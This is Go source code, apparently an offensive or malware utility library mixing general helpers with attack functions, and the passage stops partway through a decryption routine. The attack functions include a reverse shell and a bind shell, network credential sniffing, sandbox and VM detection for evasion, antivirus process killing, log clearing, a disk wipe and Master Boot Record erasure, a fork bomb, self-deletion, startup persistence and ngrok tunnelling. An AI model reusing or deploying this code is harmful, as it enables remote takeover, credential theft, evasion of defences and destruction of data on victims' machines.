// func _sleep(seconds int, endSignal chan<- bool) {
// time.Sleep(time.Duration(seconds) * time.Second)
// endSignal <- true
// }
// F is a wrapper for the Sprintf function.
func F(str string, arg ...interface{}) string {
return fmt.Sprintf(str, arg...)
}
func f(s string, arg ...interface{}) string {
return fmt.Sprintf(s, arg...)
}
// PrintGood is used to print output indicating success.
func PrintGood(msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] %s :: %s \n", Green(t), Green(Bold("[+]")), msg)
}
// PrintInfo is used to print output containing information.
func | (msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] [*] :: %s\n", t, msg)
}
// PrintError is used to print output indicating failure.
func PrintError(msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] %s :: %s \n", Red(t), Red(Bold("[x]")), msg)
}
// PrintWarning is used to print output indicating potential failure.
func PrintWarning(msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] %s :: %s \n", Yellow(t), Yellow(Bold("[!]")), msg)
}
// FileToSlice reads a textfile and returns all lines as an array.
func FileToSlice(file string) []string {
fil, _ := os.Open(file)
defer fil.Close()
var lines []string
scanner := bufio.NewScanner(fil)
for scanner.Scan() {
lines = append(lines, scanner.Text())
}
return lines
}
// Contains is used to check if an element exists in an array type agnostically.
func Contains(s interface{}, elem interface{}) bool {
arrV := reflect.ValueOf(s)
if arrV.Kind() == reflect.Slice {
for i := 0; i < arrV.Len(); i++ {
if arrV.Index(i).Interface() == elem {
return true
}
}
}
return false
}
// StrToInt converts a string into an integer.
func StrToInt(string_integer string) int {
// i, _ := strconv.ParseInt(string_integer, 10, 32)
i, _ := strconv.Atoi(string_integer)
return i
}
// StrToWords returns a list of strings which was split by spaces.
func StrToWords(s string) []string {
words := []string{}
gr := strings.Split(s, " ")
for x := range gr {
z := gr[x]
if len(z) != 0 {
words = append(words, z)
}
}
return words
}
// IntToStr converts an integer into a string.
func IntToStr(i int) string {
return strconv.Itoa(i)
}
// SizeToBytes converts a human friendly string indicating size into a proper integer.
func SizeToBytes(size string) int {
period_letter := string(size[len(size)-1])
intr := string(size[:len(size)-1])
i, _ := strconv.Atoi(intr)
switch period_letter {
case "g":
return i * 1024 * 1024 * 1024
case "m":
return i * 1024 * 1024
case "k":
return i * 1024
}
return i
}
// Alloc allocates memory without use.
func Alloc(size string) {
_ = make([]byte, SizeToBytes(size))
}
// IntervalToSeconds converts a human friendly string indicating time into a proper integer.
func IntervalToSeconds(interval string) int {
period_letter := string(interval[len(interval)-1])
intr := string(interval[:len(interval)-1])
i, _ := strconv.Atoi(intr)
switch period_letter {
case "s":
return i
case "m":
return i * 60
case "h":
return i * 3600
case "d":
return i * 24 * 3600
}
return i
}
// GenCpuLoad gives the Cpu work to do by spawning goroutines.
func GenCpuLoad(cores int, interval string, percentage int) {
runtime.GOMAXPROCS(cores)
unitHundresOfMicrosecond := 1000
runMicrosecond := unitHundresOfMicrosecond * percentage
// sleepMicrosecond := unitHundresOfMicrosecond*100 - runMicrosecond
for i := 0; i < cores; i++ {
go func() {
runtime.LockOSThread()
for {
begin := time.Now()
for {
if time.Since(begin) > time.Duration(runMicrosecond)*time.Microsecond {
break
}
}
}
}()
}
t, _ := time.ParseDuration(interval)
time.Sleep(t * time.Second)
}
// RandomInt returns an integer within a given range.
func RandomInt(min int, max int) int {
rand.Seed(time.Now().UnixNano())
return rand.Intn(max-min) + min
}
// RandomSelectStr returns a string that was randomly selected from a list of strings.
func RandomSelectStr(list []string) string {
rand.Seed(time.Now().UnixNano())
return list[rand.Intn(len(list))]
}
// RandomSelectStrNested returns a string array that was randomly selected from a nested list of strings
func RandomSelectStrNested(list [][]string) []string {
rand.Seed(time.Now().UnixNano())
return list[rand.Intn(len(list))]
}
// RandomSelectInt returns an integer that was randomly selected from a list of integers.
func RandomSelectInt(list []int) int {
rand.Seed(time.Now().UnixNano())
return list[rand.Intn(len(list))]
}
// RemoveNewLines removes possible newlines from a string.
func RemoveNewlines(s string) string {
re := regexp.MustCompile(`\r?\n`)
s = re.ReplaceAllString(s, " ")
return s
}
// FullRemove removes all instances of a string from another string.
func FullRemove(str string, to_remove string) string {
return strings.Replace(str, to_remove, "", -1)
}
// RemoveDuplicatesStr returns an array of strings that are unique to each other.
func RemoveDuplicatesStr(slice []string) []string {
keys := make(map[string]bool)
list := []string{}
for _, entry := range slice {
if _, value := keys[entry]; !value {
keys[entry] = true
list = append(list, entry)
}
}
return list
}
// RemoveDuplicatesInt returns an array of integers that are unique to each other.
func RemoveDuplicatesInt(slice []int) []int {
keys := make(map[int]bool)
list := []int{}
for _, entry := range slice {
if _, value := keys[entry]; !value {
keys[entry] = true
list = append(list, entry)
}
}
return list
}
// ContainsAny checks if a string exists within a list of strings.
func ContainsAny(str string, elements []string) bool {
for element := range elements {
e := elements[element]
if strings.Contains(str, e) {
return true
}
}
return false
}
// RandomString randomly generates an alphabetic string of a given length.
func RandomString(n int) string {
rand.Seed(time.Now().UnixNano())
var letters = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
b := make([]rune, n)
for i := range b {
b[i] = letters[rand.Intn(len(letters))]
}
return string(b)
}
// ExitOnError prints a given error and then stops execution of the process.
func ExitOnError(e error) {
if e != nil {
PrintError(e.Error())
os.Exit(0)
}
}
// RemoveFromSlice removes a string from a list of strings if it exists.
func RemoveFromSlice(slice []string, element string) []string {
res := []string{}
for _, e := range slice {
if e != element {
res = append(res, e)
}
}
return res
}
// GetLocalIp is used to get the local Ip address of the machine.
func GetLocalIp() string {
conn, _ := net.Dial("udp", "8.8.8.8:80")
defer conn.Close()
ip := conn.LocalAddr().(*net.UDPAddr).IP
return fmt.Sprintf("%d.%d.%d.%d", ip[0], ip[1], ip[2], ip[3])
}
// GetGlobalIp is used to return the global Ip address of the machine.
func GetGlobalIp() string {
ip := ""
resolvers := []string{
"https://api.ipify.org?format=text",
"http://myexternalip.com/raw",
"http://ident.me",
}
for {
url := RandomSelectStr(resolvers)
resp, err := http.Get(url)
if err != nil {
log.Printf("%v\n", err)
}
defer resp.Body.Close()
i, _ := ioutil.ReadAll(resp.Body)
ip = string(i)
if resp.StatusCode == 200 {
break
}
}
return ip
}
// GetGatewayIP returns the Ip address of the gateway in the network where the machine resides.
func GetGatewayIP() string {
ip, err := gateway.DiscoverGateway()
ExitOnError(err)
return ip.String()
}
// Iface returns the currently used wireless interface and its MAC address.
func Iface() (string, string) {
current_iface := ""
interfaces, err := net.Interfaces()
ExitOnError(err)
for _, interf := range interfaces {
if addrs, err := interf.Addrs(); err == nil {
for _, addr := range addrs {
if strings.Contains(addr.String(), GetLocalIp()) {
current_iface = interf.Name
}
}
}
}
netInterface, err := net.InterfaceByName(current_iface)
ExitOnError(err)
name := netInterface.Name
macAddress := netInterface.HardwareAddr
hwAddr, err := net.ParseMAC(macAddress.String())
ExitOnError(err)
return name, hwAddr.String()
}
// Ifaces returns the names of all local interfaces.
func Ifaces() []string {
ifs := []string{}
interfaces, _ := net.Interfaces()
for _, interf := range interfaces {
ifs = append(ifs, interf.Name)
}
return ifs
}
// Info is used to return basic system information.
// Note that if information can not be resolved in a
// specific field it returns "N/A"
func Info() map[string]string {
_, mac := Iface()
var (
u string
ap_ip string
)
i := goInfo.GetInfo()
u = info()
ap_ip = ""
_ = ap_ip
hdir, err := homedir.Dir()
if err != nil {
log.Fatalf(err.Error())
}
inf := map[string]string{
"username": u,
"hostname": fmt.Sprintf("%v", i.Hostname),
"go_os": fmt.Sprintf("%v", i.GoOS),
"os": fmt.Sprintf("%v", i.OS),
"platform": fmt.Sprintf("%v", i.Platform),
"cpu_num": fmt.Sprintf("%v", i.CPUs),
"kernel": fmt.Sprintf("%v", i.Kernel),
"core": fmt.Sprintf("%v", i.Core),
"local_ip": GetLocalIp(),
"global_ip": GetGlobalIp(),
"ap_ip": GetGatewayIP(),
"mac": mac,
"homedir": hdir,
}
return inf
}
// MD5Hash hashes a given string using the MD5.
func MD5Hash(str string) string {
hasher := md5.New()
hasher.Write([]byte(str))
return hex.EncodeToString(hasher.Sum(nil))
}
// CreateWordList generates possible variations of each word in the wordlist.
func CreateWordlist(words []string) []string {
wordlist := []string{}
for w := range words {
word := words[w]
first_to_upper := strings.ToUpper(string(word[0])) + string(word[1:])
wordlist = append(wordlist, strings.ToUpper(word))
wordlist = append(wordlist, Revert(word))
wordlist = append(wordlist, first_to_upper)
wordlist = append(wordlist, first_to_upper+"1")
wordlist = append(wordlist, first_to_upper+"12")
wordlist = append(wordlist, first_to_upper+"123")
wordlist = append(wordlist, word+"1")
wordlist = append(wordlist, word+"12")
wordlist = append(wordlist, word+"123")
}
return wordlist
}
// ReadFile is used to read a given file and return its data as a string.
func ReadFile(filename string) (string, error) {
fil, err := os.Open(filename)
if err != nil {
return "", err
}
defer fil.Close()
b, err := ioutil.ReadAll(fil)
if err != nil {
return "", err
}
return string(b), nil
}
// WriteFile is used to write data into a given file.
func WriteFile(filename, data string) error {
file, err := os.Create(filename)
if err != nil {
return err
}
defer file.Close()
_, err = io.WriteString(file, data)
if err != nil {
return err
}
return nil
}
// FilesPattern is used to return data mapped to files
// where their filenames match a given pattern.
func FilesPattern(directory, pattern string) (map[string]string, error) {
out_map := map[string]string{}
files, err := ioutil.ReadDir(directory)
if err != nil {
return nil, err
}
for _, f := range files {
fl, err := ReadFile(f.Name())
if err != nil {
return nil, err
}
if strings.Contains(fl, pattern) {
out_map[f.Name()], err = ReadFile(f.Name())
if err != nil {
return nil, err
}
}
}
return out_map, nil
}
// B64D decodes a given string encoded in Base64.
func B64D(str string) string {
raw, _ := base64.StdEncoding.DecodeString(str)
return fmt.Sprintf("%s", raw)
}
// B64E encodes a string in Base64.
func B64E(str string) string {
return base64.StdEncoding.EncodeToString([]byte(str))
}
// Wait uses a human friendly string that indicates how long a system should wait.
func Wait(interval string) {
period_letter := string(interval[len(interval)-1])
intr := string(interval[:len(interval)-1])
i, _ := strconv.ParseInt(intr, 10, 64)
var x int64
switch period_letter {
case "s":
x = i
case "m":
x = i * 60
case "h":
x = i * 3600
}
time.Sleep(time.Duration(x) * time.Second)
}
// func file_info(file string) map[string]string {
// inf, err := os.Stat(file)
// return map[string]string{
// }
// }
// Forkbomb spawns goroutines in order to crash the machine.
func Forkbomb() {
for {
go Forkbomb()
}
}
// Remove is used to self delete.
func Remove() {
os.Remove(os.Args[0])
}
// Exists checks if a given file is in the system.
func Exists(file string) bool {
_, err := os.Stat(file)
if err != nil {
if os.IsNotExist(err) {
return false
}
}
return true
}
// IsRoot checks if the current user is the administrator of the machine.
func IsRoot() bool {
return isRoot()
}
// CmdOut executes a given command and returns its output.
func CmdOut(command string) (string, error) {
return cmdOut(command)
}
// func cmd_out_ssh(address, username, password, command string) (string, error) {
// config := &ssh.ClientConfig{
// User: username,
// Auth: []ssh.AuthMethod{
// ssh.Password(password),
// },
// }
// client, err := ssh.Dial("tcp", address, config)
// if err != nil {
// return "", err
// }
// session, err := client.NewSession()
// if err != nil {
// return "", err
// }
// defer session.Close()
// var b bytes.Buffer
// session.Stdout = &b
// err = session.Run(command)
// return b.String(), err
// }
// CmdOutPlatform executes a given set of commands based on the OS of the machine.
func CmdOutPlatform(commands map[string]string) (string, error) {
cmd := commands[runtime.GOOS]
out, err := CmdOut(cmd)
if err != nil {
return "", err
}
return out, nil
}
// CmdRun executes a command and writes output as well
// as error to STDOUT.
func CmdRun(command string) {
parts := strings.Fields(command)
head := parts[0]
parts = parts[1:]
cmd := exec.Command(head, parts...)
output, err := cmd.CombinedOutput()
if err != nil {
PrintError(err.Error())
fmt.Println(string(output))
//fmt.Println(red(err.Error()) + ": " + string(output))
} else {
fmt.Println(string(output))
}
//ExitOnError("[COMMAND EXEC ERROR]", err)
}
// CmdBlind runs a command without any side effects.
func CmdBlind(command string) {
parts := strings.Fields(command)
head := parts[0]
parts = parts[1:]
cmd := exec.Command(head, parts...)
_, _ = cmd.CombinedOutput()
// ExitOnError("[COMMAND EXEC ERROR]", err)
}
// CmdDir executes commands which are mapped to a string
// indicating the directory where the command is executed.
func CmdDir(dirs_cmd map[string]string) ([]string, error) {
outs := []string{}
for dir, cmd := range dirs_cmd {
err := os.Chdir(dir)
if err != nil {
return nil, err
}
o, err := CmdOut(cmd)
if err != nil {
return nil, err
}
outs = append(outs, o)
}
return outs, nil
}
// MakeZip packs a list of given files within a zip archive.
func MakeZip(zip_file string, files []string) error {
newZipFile, err := os.Create(zip_file)
if err != nil {
return err
}
defer newZipFile.Close()
zipWriter := zip.NewWriter(newZipFile)
defer zipWriter.Close()
for _, file := range files {
fileToZip, err := os.Open(file)
if err != nil {
return err
}
defer fileToZip.Close()
info, err := fileToZip.Stat()
if err != nil {
return err
}
header, err := zip.FileInfoHeader(info)
if err != nil {
return err
}
header.Name = file
header.Method = zip.Deflate
writer, err := zipWriter.CreateHeader(header)
if err != nil {
return err
}
_, err = io.Copy(writer, fileToZip)
if err != nil {
return err
}
}
return nil
}
// CredentialsSniff is used to sniff network traffic for
// private user information.
func CredentialsSniff(ifac, interval string,
collector chan string,
words []string) error {
ifs := []string{}
if ifac != "all" {
ifs = []string{ifac}
} else {
ifs = append(ifs, ifs...)
}
hits := []string{"password", "user",
"username", "secrets", "auth"}
for w := range words {
word := words[w]
hits = append(hits, word)
}
for h := range hits {
hit := hits[h]
hits = append(hits, strings.ToUpper(hit))
hits = append(hits, strings.ToUpper(string(hit[0]))+string(hit[1:]))
}
var snapshot_len int32 = 1024
var timeout time.Duration = time.Duration(IntervalToSeconds(interval)) * time.Second
for _, i := range ifs {
handler, err := pcap.OpenLive(i, snapshot_len, false, timeout)
if err != nil {
return err
}
defer handler.Close()
source := gopacket.NewPacketSource(handler, handler.LinkType())
for p := range source.Packets() {
app_layer := p.ApplicationLayer()
pay := app_layer.Payload()
for h := range hits {
hit := hits[h]
if bytes.Contains(pay, []byte(hit)) {
collector <- string(pay)
}
}
}
}
return nil
}
// SandboxFilePath checks if the process is being run
// inside a virtualized environment.
func SandboxFilepath() bool {
return sandboxFilepath()
}
// SandboxProc checks if there are processes that indicate
// a virtualized environment.
func SandboxProc() bool {
sandbox_processes := []string{`vmsrvc`, `tcpview`, `wireshark`, `visual basic`, `fiddler`,
`vmware`, `vbox`, `process explorer`, `autoit`, `vboxtray`, `vmtools`,
`vmrawdsk`, `vmusbmouse`, `vmvss`, `vmscsi`, `vmxnet`, `vmx_svga`,
`vmmemctl`, `df5serv`, `vboxservice`, `vmhgfs`}
p, _ := Processes()
for _, name := range p {
if ContainsAny(name, sandbox_processes) {
return true
}
}
return false
}
// SandboxSleep is used to check if the virtualized environment
// is speeding up the sleeping process.
func SandboxSleep() bool {
z := false
firstTime := getNTPTime()
sleepSeconds := 10
time.Sleep(time.Duration(sleepSeconds*1000) * time.Millisecond)
secondTime := getNTPTime()
difference := secondTime.Sub(firstTime).Seconds()
if difference < float64(sleepSeconds) {
z = true
}
return z
}
// SandboxDisk is used to check if the environment's
// disk space is less than a given size.
/* sandboxDisk is missing dependency
func SandboxDisk(size int) bool {
return sandboxDisk(size)
}
*/
// SandboxCpu is used to check if the environment's
// cores are less than a given integer.
func SandboxCpu(cores int) bool {
x := false
num_procs := runtime.NumCPU()
if !(num_procs >= cores) {
x = true
}
return x
}
// SandboxRam is used to check if the environment's
// RAM is less than a given size.
func SandboxRam(ram_mb int) bool {
var m runtime.MemStats
runtime.ReadMemStats(&m)
rmb := uint64(ram_mb)
ram := m.TotalAlloc / 1024 / 1024
return ram < rmb
}
// SandboxUtc is used to check if the environment
// is in a properly set Utc timezone.
func SandboxUtc() bool {
_, offset := time.Now().Zone()
return offset == 0
}
// SandboxProcnum is used to check if the environment
// has processes less than a given integer.
func SandboxProcnum(proc_num int) bool {
processes, err := ps.Processes()
if err != nil {
return true
}
return len(processes) < proc_num
}
// SandboxTmp is used to check if the environment's
// temporary directory has less files than a given integer.
func SandboxTmp(entries int) bool {
return sandboxTmp(entries)
}
// SandboxMac is used to check if the environment's MAC address
// matches standard MAC adddresses of virtualized environments.
func SandboxMac() bool {
hits := 0
sandbox_macs := []string{`00:0C:29`, `00:1C:14`,
`00:50:56`, `00:05:69`, `08:00:27`}
ifaces, _ := net.Interfaces()
for _, iface := range ifaces {
for _, mac := range sandbox_macs {
if strings.Contains(strings.ToLower(iface.HardwareAddr.String()), strings.ToLower(mac)) {
hits += 1
}
}
}
return hits == 0
}
// SandboxAll is used to check if an environment is virtualized
// by testing all sandbox checks.
func SandboxAll() bool {
values := []bool{
SandboxProc(),
SandboxFilepath(),
SandboxCpu(2),
// SandboxDisk(50), Missing dependency
SandboxSleep(),
SandboxTmp(10),
SandboxProcnum(100),
SandboxRam(2048),
SandboxUtc(),
}
for s := range values {
x := values[s]
if x {
return true
}
}
return false
}
// SandboxAlln checks if an environment is virtualized by testing all
// sandbox checks and checking if the number of successful checks is
// equal or greater to a given integer.
func SandboxAlln(num int) bool {
num_detected := 0
values := []bool{
SandboxProc(),
SandboxFilepath(),
SandboxCpu(2),
// SandboxDisk(50), Missing dependency
SandboxSleep(),
SandboxTmp(10),
SandboxTmp(100),
SandboxRam(2048),
SandboxMac(),
SandboxUtc(),
}
for s := range values {
x := values[s]
if x {
num_detected += 1
}
}
return num_detected >= num
}
// Shutdown forces the machine to shutdown.
func Shutdown() error {
return shutdown()
}
// func set_ttl(interval string){
// endSignal := make(chan bool, 1)
// go _sleep(interval_to_seconds(interval), endSignal)
// select {
// case <-endSignal:
// remove()
// os.Exit(0)
// }
// }
// func SetTTL(duration string) {
// c := cron.New()
// c.AddFunc("@every "+duration, remove)
// c.Start()
// }
// Bind tells the process to listen to a local port
// for commands.
func Bind(port int) {
listen, err := net.Listen("tcp", "0.0.0.0:"+strconv.Itoa(port))
ExitOnError(err)
defer listen.Close()
for {
conn, err := listen.Accept()
if err != nil {
PrintError("Cannot bind to selected port")
}
handleBind(conn)
}
}
// Reverse initiates a reverse shell to a given host:port.
func Reverse(host string, port int) {
conn, err := net.Dial("tcp", host+":"+strconv.Itoa(port))
ExitOnError(err)
for {
handleReverse(conn)
}
}
// PkillPid kills a process by its PID.
func PkillPid(pid int) error {
err := KillProcByPID(pid)
return err
}
// PkillName kills a process by its name.
func PkillName(name string) error {
processList, err := ps.Processes()
if err != nil {
return err
}
for x := range processList {
process := processList[x]
proc_name := process.Executable()
pid := process.Pid()
if strings.Contains(proc_name, name) {
err := KillProcByPID(pid)
if err != nil {
return err
}
}
}
return nil
}
// PkillAv kills Anti-Virus processes that may run within the machine.
func PkillAv() error {
return pkillAv()
}
// Processes returns a map of a PID to its respective process name.
func Processes() (map[int]string, error) {
prs := make(map[int]string)
processList, err := ps.Processes()
if err != nil {
return nil, err
}
for x := range processList {
process := processList[x]
prs[process.Pid()] = process.Executable()
}
return prs, nil
}
// Portscan checks for open ports in a given target.
func Portscan(target string, timeout, threads int) (pr []int) {
ps := portscanner.NewPortScanner(target, time.Duration(timeout)*time.Second, threads)
opened_ports := ps.GetOpenedPort(0, 65535)
for p := range opened_ports {
port := opened_ports[p]
pr = append(pr, port)
}
return
}
// PortscanSingle checks if a specific port is open in a given target.
func PortscanSingle(target string, port int) bool {
ps := portscanner.NewPortScanner(target, time.Duration(10)*time.Second, 3)
opened_ports := ps.GetOpenedPort(port-1, port+1)
return len(opened_ports) != 0
}
// Bannergrab returns a service banner string from a given port.
func BannerGrab(target string, port int) (string, error) {
conn, err := net.DialTimeout("tcp", target+":"+strconv.Itoa(port), time.Second*10)
if err != nil {
return "", err
}
buffer := make([]byte, 4096)
conn.SetReadDeadline(time.Now().Add(time.Second * 5))
n, err := conn.Read(buffer)
if err != nil {
return "", err
}
banner := buffer[0:n]
return string(banner), nil
}
// SendDataTCP sends data to a given host:port using the TCP protocol.
func SendDataTCP(host string, port int, data string) error {
addr := host + ":" + strconv.Itoa(port)
conn, err := net.Dial("tcp", addr)
if err != nil {
return err
}
_, err = io.WriteString(conn, data+"\n")
if err != nil {
return err
}
defer conn.Close()
return nil
}
// SendDataUDP sends data to a given host:port using the UDP protocol.
func SendDataUDP(host string, port int, data string) error {
addr := host + ":" + strconv.Itoa(port)
conn, err := net.Dial("udp", addr)
if err != nil {
return err
}
_, err = io.WriteString(conn, data+"\n")
if err != nil {
return err
}
defer conn.Close()
return nil
}
// FilePermissions checks if a given file has read and write permissions.
func FilePermissions(filename string) (bool, bool) {
write_permission := true
read_permission := true
file, err := os.OpenFile(filename, os.O_WRONLY, 0666)
if err != nil {
if os.IsPermission(err) {
write_permission = false
}
}
file.Close()
return read_permission, write_permission
}
// Download downloads a file from a url.
func Download(url string) error {
splitted := strings.Split(url, "/")
filename := splitted[len(splitted)-1]
f, err := os.Create(filename)
if err != nil {
return err
}
defer f.Close()
response, err := http.Get(url)
if err != nil {
return err
}
defer response.Body.Close()
_, err = io.Copy(f, response.Body)
if err != nil {
return err
}
return nil
}
// Users returns a list of known users within the machine.
func Users() ([]string, error) {
return users()
}
// EraseMbr zeroes out the Master Boot Record.
func EraseMbr(device string, partition_table bool) error {
cmd := f("dd if=/dev/zero of=%s bs=446 count=1", device)
if partition_table {
cmd = f("dd if=/dev/zero of=%s bs=512 count=1", device)
}
_, err := CmdOut(cmd)
if err != nil {
return err
}
return nil
}
// Networks returns a list of nearby wireless networks.
func Networks() ([]string, error) {
return networks()
}
// ExpandCidr returns a list of Ip addresses within a given CIDR.
func ExpandCidr(cidr string) ([]string, error) {
ip, ipnet, err := net.ParseCIDR(cidr)
if err != nil {
return nil, err
}
var ips []string
for ip := ip.Mask(ipnet.Mask); ipnet.Contains(ip); IpIncrement(ip) {
ips = append(ips, ip.String())
}
lenIPs := len(ips)
switch {
case lenIPs < 2:
return ips, nil
default:
return ips[1 : len(ips)-1], nil
}
}
// ClearLogs removes logfiles within the machine.
func ClearLogs() error {
return clearLogs()
}
// Wipe deletes all data in the machine.
func Wipe() error {
return wipe()
}
// DnsLookup returns the list of Ip adddress associated with the given hostname.
func DnsLookup(hostname string) ([]string, error) {
i := []string{}
ips, err := net.LookupIP(hostname)
if err != nil {
return nil, err
}
for _, ip := range ips {
i = append(i, ip.String())
}
return i, nil
}
// RdnsLookup returns the list of hostnames associated with the given Ip address.
func RdnsLookup(ip string) ([]string, error) {
ips, err := net.LookupAddr(ip)
if err != nil {
return nil, err
}
return ips, nil
}
// CreateUser creates a user with a given username and password.
// TODO
// WifiDisconnect is used to disconnect the machine from a wireless network.
func WifiDisconnect() error {
return wifiDisconnect()
}
// Disks returns a list of storage drives within the machine.
func Disks() ([]string, error) {
return disks()
}
// CopyFile copies a file from one directory to another.
func CopyFile(src, dst string) error {
sourceFileStat, err := os.Stat(src)
if err != nil {
return err
}
if !sourceFileStat.Mode().IsRegular() {
return fmt.Errorf("%s is not a regular file", src)
}
source, err := os.Open(src)
if err != nil {
return err
}
defer source.Close()
destination, err := os.Create(dst)
if err != nil {
return err
}
defer destination.Close()
_, err = io.Copy(destination, source)
return err
}
// TraverseCurrentDir lists all files that exist within the current directory.
func TraverseCurrentDir() ([]string, error) {
files_in_dir := []string{}
files, err := ioutil.ReadDir(".")
if err != nil {
return nil, err
}
for _, f := range files {
files_in_dir = append(files_in_dir, f.Name())
}
return files_in_dir, nil
}
// TraverseDir lists all files that exist within a given directory.
func TraverseDir(dir string) ([]string, error) {
files_in_dir := []string{}
files, err := ioutil.ReadDir(dir)
if err != nil {
return nil, err
}
for _, f := range files {
files_in_dir = append(files_in_dir, f.Name())
}
return files_in_dir, nil
}
// RemoveStr removes a given string from a list of strings.
func RemoveStr(slice []string, s string) []string {
final := []string{}
for _, e := range slice {
if e != s {
final = append(final, e)
}
}
return final
}
// RemoveInt removes a given integer from a list of integers.
func RemoveInt(slice []int, s int) []int {
final := []int{}
for _, e := range slice {
if e != s {
final = append(final, e)
}
}
return final
}
// AddPersistentCommand creates a task that runs a given command on startup.
func AddPersistentCommand(cmd string) error {
return addPersistentCommand(cmd)
}
// RegexMatch checks if a string contains valuable information through regex.
func RegexMatch(regex_type, str string) bool {
regexes := map[string]string{
"mail": "^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$",
"ip": `(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}`,
"mac": `^([0-9A-Fa-f]{2}[:-])/contains{5}([0-9A-Fa-f]{2})$`,
"date": `\d{4}-\d{2}-\d{2}`,
"domain": `^(?:https?:\/\/)?(?:[^@\/\n]+@)?(?:www\.)?([^:\/\n]+)`,
"phone": `^(?:(?:\(?(?:00|\+)([1-4]\d\d|[1-9]\d?)\)?)?[\-\.\ \\\/]?)?((?:\(?\d{1,}\)?[\-\.\ \\\/]?){0,})(?:[\-\.\ \\\/]?(?:#|ext\.?|extension|x)[\-\.\ \\\/]?(\d+))?$`,
"ccn": `^(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$`,
"time": `^([0-9]|0[0-9]|1[0-9]|2[0-3]):([0-9]|[0-5][0-9])$`,
"crypto": `^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$`,
}
r := regexp.MustCompile(regexes[regex_type])
matches := r.FindAllString(str, -1)
return len(matches) != 0
}
// ShuffleSlice randomly shuffles a list of strings.
func ShuffleSlice(s []string) []string {
rand.Seed(time.Now().UnixNano())
rand.Shuffle(len(s), func(i, j int) {
s[i], s[j] = s[j], s[i]
})
return s
}
// StartNgrokTCP exposes a TCP server on a given port.
func StartNgrokTCP(port int) error {
_, err := CmdOut(F("ngrok tcp %d", port))
return err
}
// StartNgrokHTTP exposes a web server on a given port.
func StartNgrokHTTP(port int) error {
_, err := CmdOut(F("ngrok http %d", port))
return err
}
// GetNgrokURL returns the URL of the Ngrok tunnel exposing the machine.
func GetNgrokURL() (string, error) {
local_url := "http://localhost:4040/api/tunnels"
resp, err := http.Get(local_url)
if err != nil {
return "", err
}
defer resp.Body.Close()
json, err := ioutil.ReadAll(resp.Body)
if err != nil {
return "", err
}
jq_op_1, _ := jq.Parse(".tunnels")
json_1, _ := jq_op_1.Apply(json)
jq_op_2, _ := jq.Parse(".[0]")
json_2, _ := jq_op_2.Apply(json_1)
jq_op_3, _ := jq.Parse(".public_url")
json_3, _ := jq_op_3.Apply(json_2)
json_sanitized := FullRemove(string(json_3), `"`)
return json_sanitized, nil
}
// ExtractIntFromString extracts a list of possible integers from a given string.
func ExtractIntFromString(s string) []int {
res := []int{}
re := regexp.MustCompile(`[-]?\d[\d,]*[\.]?[\d{2}]*`)
// fmt.Printf("String contains any match: %v\n", re.MatchString(str1)) // True
submatchall := re.FindAllString(s, -1)
for _, element := range submatchall {
res = append(res, StrToInt(element))
}
return res
}
// Splitjoin splits a string then joins them using given delimiters.
func SplitJoin(s, splitter, joiner string) string {
splitted := strings.Split(s, splitter)
joined := strings.Join(splitted, joiner)
return joined
}
// RevertSlice reverses a slice type agnostically.
func RevertSlice(s interface{}) {
n := reflect.ValueOf(s).Len()
swap := reflect.Swapper(s)
for i, j := 0, n-1; i < j; i, j = i+1, j-1 {
swap(i, j)
}
}
// func dialog(message, title string) {
// zenity.Info(message, zenity.Title(title))
// }
func SplitMultiSep(s string, seps []string) []string {
f := func(c rune) bool {
for _, sep := range seps {
if string(c) == sep {
return true
}
}
return false
}
fields := strings.FieldsFunc(s, f)
return fields
}
func SplitChunks(s string, chunk int) []string {
if chunk >= len(s) {
return []string{s}
}
var chunks []string
c := make([]rune, chunk)
len := 0
for _, r := range s {
c[len] = r
len++
if len == chunk {
chunks = append(chunks, string(c))
len = 0
}
}
if len > 0 {
chunks = append(chunks, string(c[:len]))
}
return chunks
}
/*
func keyboard_emul(keys string) error {
}
func proxy_tcp() error {
}
func proxy_udp() error {
}
func proxy_http() error {
}
func webshell(param, password string) error {
}
func stamp() {
}
func detect_user_interaction() (bool, error) {
}*/
func GenerateKey() []byte {
random_bytes := make([]byte, 32)
_, err := crandom.Read(random_bytes) // Generates 32 cryptographically secure random bytes
if err != nil {
println("Failed to generate the key.")
return nil
}
return random_bytes
}
func GenerateIV() []byte {
random_bytes := make([]byte, 16)
_, err := crandom.Read(random_bytes) // Generates 16 cryptographically secure random bytes
if err != nil {
println("Failed to generate IV.")
return nil
}
return random_bytes
}
func EncryptBytes(secret_message []byte, key []byte) []byte {
cipher_block, err := aes.NewCipher(key)
if err != nil {
println("Error occured, can't encrypt")
return nil
}
length_to_bytes := make([]byte, 4)
binary.LittleEndian.PutUint32(length_to_bytes, uint32(len(secret_message)))
length_and_secret := append(length_to_bytes, secret_message...)
IV := GenerateIV()
if len(length_and_secret)%16 != 0 {
appending := make([]byte, (16 - len(length_and_secret)%16))
corrected := append(length_and_secret, appending...)
length_and_secret = corrected
}
c := cipher.NewCBCEncrypter(cipher_block, IV)
encrypted := make([]byte, len(length_and_secret))
c.CryptBlocks(encrypted, length_and_secret)
return append(IV, encrypted...)
}
func DecryptBytes(encrypted_message []byte, key []byte) []byte {
IV := encrypted_message[0:16]
actual_ciphertext := encrypted_message[16:]
cipher_block, err := aes.NewCipher(key)
if err != nil {
println("Error occured, can't decrypt")
}
c := cipher.NewCBCDecrypter(cipher_block, IV)
decrypted := make([]byte, len(actual_ciphertext))
c.CryptBlocks(decrypted, actual_ciphertext)
length_bytes := decrypted[0:4]
